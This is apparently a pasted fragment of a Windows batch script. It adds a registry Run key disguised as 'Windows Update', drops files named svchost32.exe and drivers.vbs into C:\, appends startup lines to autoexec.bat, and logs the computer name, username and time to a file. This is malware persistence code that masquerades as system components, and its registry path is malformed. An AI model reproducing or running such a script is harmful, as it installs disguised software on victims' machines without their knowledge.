- reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current\VersionRun "Windows Update"="/"C:\Svchost32.exe"" /y
- copy .\system\svchost32.exe C:\svchost32.exe
- copy .\system\drivers.vbs C:\drivers.vbs
- echo start drivers.vbs C:\svchost32.exe >> autoexec.bat
- type autoexec.bat >> C:\autoexec.bat
- :end
- echo ----------------------------------------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- echo -----Time:%date% %time%----- >> ..\.\Documents\%computername%\%username%.txt
- echo ----------------------------------------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
- exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement